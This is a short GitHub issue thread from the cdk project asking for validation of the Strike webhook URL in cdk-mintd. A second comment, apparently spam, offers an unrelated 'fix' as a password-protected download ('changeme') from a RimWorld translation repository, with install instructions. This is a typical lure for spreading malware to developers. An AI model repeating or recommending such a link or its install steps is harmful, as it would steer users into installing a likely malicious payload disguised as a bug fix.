### ISSUE TITLE
mintd(strike): Check webhook url is valid

### ISSUE THREAD

**Issue by thesimplekid** [cashubtc/cdk#306]
https://github.com/cashubtc/cdk/blob/741370bc4be2a0a222188892814ce1509f94d69c/crates/cdk-mintd/src/main.rs#L171

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
